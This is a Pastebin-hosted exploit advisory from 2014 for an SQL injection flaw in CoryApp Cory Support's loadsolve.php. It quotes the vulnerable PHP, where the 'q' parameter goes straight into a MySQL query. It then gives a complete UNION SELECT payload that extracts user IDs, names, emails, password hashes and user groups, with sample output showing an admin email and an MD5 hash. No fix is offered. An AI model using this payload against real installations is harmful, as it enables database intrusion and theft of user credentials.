Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title CoryApp Cory Support SQL Injection Vulnerability
- Date add 2014-03-02
- Category web applications
- Platform php
- Risk <font color="#FFBF00">Security Risk High</font>
- Description CoryApp Cory Support suffers from a remote SQL injection vulnerability.
- =========================================
- # Exploit Title: CoryApp (Cory Support) MySQL Injection Vulnerabilities
- # Google Dork: None
- # Date: 02,March 02,2014
- # Exploit Author: Slotleet
- # Vendor Homepage: http://coryapp.com
- # Software Link:
- http://coryapp.com/download/?file=6108cd096d1c940dcff7c300ba966934 (u
- have to register)
- # Version: None
- # Tested on: Win,Linux
- # Greet'z : I-HMX <3
- ==========================
- Vulnerability Description
- ==========================
- The Cory Support is prone to Get MySQL Injection Vulnerabilities
- ==========================
- PoC-Exploit
- ==========================
- // GET MySQL Injection with "q" Parameter in /loadsolve.php
- 1 : <?php
- 2 : require_once('includes/config.php');
- 3 : require_once('includes/database.php');
- 4 : $sql = "select Solutions, ProblemID from
- ".$table_prefix."problemsolutions where ProblemID = '".$_GET['q']."'
- limit 3";
- 5 : $qry = mysql_query($sql);
- 6 : if(mysql_num_rows($qry)>0){
- 7 : while($rows = mysql_fetch_array($qry)){
- 8 : echo '<img src="'.$base_url.'imgs/re.gif"
- style="margin-left:3%"/>'.stripslashes($rows['Solutions']).'<br>';
- 9 : }
- 10 : echo '<p style="margin:0px; padding:0px; margin-left:3%">. .
- .</p><a href="'.$base_url.'view.php?id='.$_GET['q'].'"><small><i>View
- more</i></small></a>';
- 11 : }
- 12 : else echo '<i>Not have answer !</i>';
- 13 : mysql_close();
- 14 : ?>
- In line 3 coder failed to secure the "q" Parameter Against (MySQL
- Injection) using q parameter
- (1) Under "q" set your GET Parameter q to "999999.9' union all select
- (select concat(0x27%2C0x7e%2Cunhex(Hex(cast(sp_users.UserID as
- char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Name as
- char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Email as
- char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Password as
- char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.UserGroup as
- char)))%2C0x27%2C0x7e) from `DATABASE NAME HERE`.sp_users limit 5%2C1)
- %2C0x31303235343830303536 and 'x'%3D'x" (without quotation marks)
- The "q" GET MySQL injection will be executed for the MySQL Server From
- browser (You'll see the info like
- '~6^admin^slotleet@gmail.com^e10adc3949ba59abbe56e057f20f883e^3'~)
- ==========================
- Solution
- ==========================
- Not Available.
- ==========================
- Credits
- ==========================
- Vulnerabilities found and advisory written by Slotleet.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement